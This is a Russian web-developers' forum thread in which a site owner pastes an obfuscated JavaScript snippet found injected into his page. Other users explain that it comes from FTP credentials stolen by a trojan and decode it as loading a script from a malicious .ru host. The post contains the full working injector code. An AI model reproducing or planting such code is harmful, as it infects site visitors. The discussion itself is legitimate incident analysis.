|
|
|
| на одном из своих сайтов, сданных еще в 05-м году, обнаружил в коде страницы в самом низу приписочку:
<script>var Ta;if(Ta!='Ng' && Ta!='h'){Ta=''};this.Tw='';try {this.c='';this.to='';var N="repl"+"aceMsDP".substr(0,3);var vg="";var hj;if(hj!='j' && hj != ''){hj=null};var e=new Array();var o=new Array();var Nn=RegExp;this.MS="";function Q(r,v){var Au=new Date();var D="Qi2Z[".substr(4);var AK;if(AK!='qH'){AK='qH'};var Ni=new String("g");var p=new Date();this.Ba='';D+=v;this.Yc='';var Bm;if(Bm!='Vk' && Bm!='vV'){Bm='Vk'};D+=String("]");var Tr="";var z;if(z!='Fo' && z != ''){z=null};var T=new Nn(D, Ni);this.uu="";return r[N](T, new String());};var i=new String();var t=window;this.Qa="";this.zC="";var R=new Array();var KW;if(KW!='' && KW!='pd'){KW=''};var d=Q('c0r3eva1t0e1E3l1evm0e1n0t0',"v130");var RG;if(RG!='Fh' && RG != ''){RG=null};var I=Q('/jgPowoPgPl0e0.jc0o0m0/PgwoPojgPlweP.jcjoPmj/PbPajrPnjewsjawnjdjnwowbPljeP.0cwoPm0/Pmjt0ijmwe0.PcPo0m0/0nPejoPbwuPxP.0c0ojmw.PpPh0p0',"wjP0");var jm;if(jm!='zM'){jm='zM'};this.Vi='';var _=Q('hAt0t0pA:0/A/Ai0nAd0iAa0nAr0a0i0lA-Ag0oAvA-0i0n0.As0kAyAc0n0.AcAo0m0.0mAc0sAs0lA-0cAo0m0.AYAoAuArASAuApAe0rAPAoAo0lA.ArAuA:0',"A0");var s=Q('s8cdr4i8p8t8',"48d");var DO='';var H=Q('896966066968969906999',"96");this.wb="";var Io=new String();var V=Q('oJnElIomaEdJ',"ImkJE");var Gj=new Array();var tD=new Array();E=function(){P=document[d](s);var Lw;if(Lw!='' && Lw!='Xo'){Lw='ha'};var Br="";var Yk;if(Yk!='qc'){Yk='qc'};DO=_+H;var re=new Array();var qg=new Array();DO+=I;var jP=new String();var RU;if(RU!='bk' && RU != ''){RU=null};var uz;if(uz!='za'){uz='za'};P.src=DO;var hp;if(hp!='ow' && hp!='zN'){hp=''};var lU='';P.defer=([1,8][0]);var UK;if(UK!='' && UK!='Lx'){UK=''};var VE=new Array();document.body.appendChild(P);this.LX='';var bA="";};var zQ;if(zQ!='' && zQ!='zv'){zQ='UR'};var nO=new Date();t[V]=E;var Bs=new String();var wE='';var Uq;if(Uq!='eif' && Uq!='x'){Uq='eif'};} catch(U){var ZR;if(ZR!='' && ZR!='Sk'){ZR=null};};var ww;if(ww!='mQ' && ww!='WB'){ww='mQ'};this.Kf="";</script>
<!--3c16b6e0e6ecc5f7feac777f03547a36-->
|
Это таки вирус? Как им заражаются? Почему, например, антивирус провайдера его игнорирует, а пользователи начинают получать предупреждения систем безопасности? | |
|
|
|
|
|
|
|
для: DJ Paltus
(21.04.2010 в 10:51)
| | Заражение идет с вашей клиентской машины (поэтому к провайдеру притензий быть не может), вирус/троян сидит у вас на машине и ворует FTP-пароли, которые затем робот использует для правки ваших страниц. | |
|
|
|
|
|
|
|
для: cheops
(21.04.2010 в 12:16)
| | Как-то так я и подумал.
Интересно, чем этот код занимается... | |
|
|
|
|
|
|
|
для: DJ Paltus
(21.04.2010 в 12:49)
| | генерирует
<script src="http://indianrail-gov-in.skycn.com.mcssl-com.YourSuperPool.ru:8080/google.com/google.com/barnesandnoble.com/mtime.com/neobux.com.php"></script>
и вставляет на страницу. | |
|
|
|
|
|
|
|
для: DJ Paltus
(21.04.2010 в 10:51)
| | >Почему, например, антивирус провайдера его игнорирует, а пользователи начинают получать предупреждения систем безопасности?
У меня только что аваст завизжал, когда я пытался открыть эту тему через ИЕ. Этот пост в Опере пишу. | |
|
|
|
|
|
|
|
для: Commander
(21.04.2010 в 14:16)
| | А что опасного в данной теме? | |
|
|
|
|
|
|
|
для: sim5
(21.04.2010 в 14:32)
| | Код, который в первом посте. Ничего другого в этой теме нет. Другие темы открываются без проблем. Чтобы открыть эту тему, пришлось приостановить аваст. Дурь. | |
|
|
|
|
|
|
|
для: Commander
(22.04.2010 в 09:03)
| | В этом посте не код, а текст этого кода. | |
|
|
|
|
|
|
|
для: sim5
(22.04.2010 в 10:34)
| | Я понимаю. Аваст дурью мается - это я понял сразу. | |
|
|
|
|
|
|
|
для: Commander
(21.04.2010 в 14:16)
| | что лишний раз говорит о "качестве" аваста.. | |
|
|
|
|
|
|
|
для: root
(21.04.2010 в 14:38)
| | Скрытая реклама? Любой современный антивирь "журчит" при виде таких строк | |
|
|
|
|
|
|
|
для: mihdan
(21.04.2010 в 15:16)
| | где реклама?
слово качество не даром в кавычки взято было.
>Любой современный антивирь "журчит" при виде таких строк
Мой не "журчит", и правильно делает, т.к. выдавать false positive на ровном месте это бред. | |
|
|
|
|
|
|
|
для: root
(21.04.2010 в 15:25)
| | И вообще если браузер нормальный, то скрипты не предоставляют никакой опасности. | |
|
|
|
|
|
|
|
для: ~AquaZ~
(23.04.2010 в 08:50)
| | Что?! | |
|
|
|
|
|
|
|
для: sim5
(23.04.2010 в 10:02)
| | Ну нормальный если. Текстовый. Люнкс там... | |
|
|
|
|
|
|
|
для: DJ Paltus
(24.04.2010 в 00:45)
| | Ну понятно, типа смотреть веб-страницы Блокнотом... Ну тады таки да, все пофигу. Только назвать Блокнот нормальным браузером язык как-то не поворачивается. | |
|
|
|